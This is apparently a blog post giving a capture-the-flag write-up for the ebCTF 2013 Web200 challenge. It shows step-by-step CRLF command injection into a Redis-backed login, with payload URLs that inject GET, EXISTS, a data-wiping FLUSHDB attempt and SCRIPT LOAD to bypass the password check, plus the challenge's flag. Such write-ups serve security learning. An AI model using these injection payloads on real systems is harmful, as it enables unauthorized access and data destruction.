2013年8月4日 星期日

ebCTF@OHM2013 Web200

Web200
http://54.217.3.87:5000/

It is a login interface using NoSQL database. Try with test/test:
http://54.217.3.87:5000/?action=login&username=test&password=test
Response:
User not found

Nice response. Then try with SQLi:
http://54.217.3.87:5000/?action=login&username=test%27+or+%27z%27%3D%27z&password=test
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR wrong number of arguments for 'get' command

Weird error message. Search "open source, BSD licensed, advanced key-value store" and you will get "Redis", which is a NoSQL database. The nice thing of Redis's website is you can test the commands:
http://redis.io/commands/get

Search "wrong number of arguments for 'get' command" and you will get the clue about the 'get' command needs only one argument.
The space character rocks. Then how can we inject other query or do subquery?
If we put a line break (%0d%0a), then it starts another line for another command, let say GET admin:
http://54.217.3.87:5000/?action=login&username=test%0d%0aGET%20admin&password=test
Response:
User not found

No error message, but user not found. So there is no admin.
If we try other commands, like EXISTS something:
http://54.217.3.87:5000/?action=login&username=test%0d%0aEXISTS%20admin&password=test
Response:
User found however the SHA-1 hash in the database does not match the SHA-1 hash of the password you provided.

From the message, I guess the query is retrieving the password sha-1 hash with the username as key value.
Using EXISTS someweirdkey should return 0, and maybe we can try this:
http://54.217.3.87:5000/?action=login&username=0%0d%0aEXISTS%20someweirdkey&password=0
Response:
User found however the SHA-1 hash in the database does not match the SHA-1 hash of the password you provided.

It looks like I need to give a password with sha1 hash is 0, or find some other way to output 0 for the command. The former way doesn't make sense, so how about the latter way. sha1("password") = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, so we have:
http://54.217.3.87:5000/?action=login&username=admin%0d%0aECHO%205baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&password=password
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR unknown command 'ECHO'

Oh, they blocked ECHO. When you get angry, you may want to try this:
http://54.217.3.87:5000/?action=login&username=test%0d%0aFLUSHDB&password=test
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -READONLY You can't write against a read only slave.

:) Let's continue. If you search "site:redis.io sha command", you will get some funny commands called "SCRIPT LOAD" and "SCRIPT EXISTS".
http://redis.io/commands/script-load
** This command returns the SHA1 digest of the script added into the script cache. **

Wow. This is what we want. And the page for SCRIPT EXISTS gives you an example:
SCRIPT LOAD "return 1"
Now let's try:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20%22return%201%22&password=return%201
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR Unknown SCRIPT subcommand or wrong # of args.

Oh damn you, the space rocks. How about quoting the stuff with single quote:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20'return%201'&password=return%201
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR Unknown SCRIPT subcommand or wrong # of args.

We need something that doesn't need space. Finally we have:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20return&password=return
Response:
Congrats the flag is: ebCTF{de26ceb319c7636f09adf6238e7fd606}


return what?.

沒有留言:

張貼留言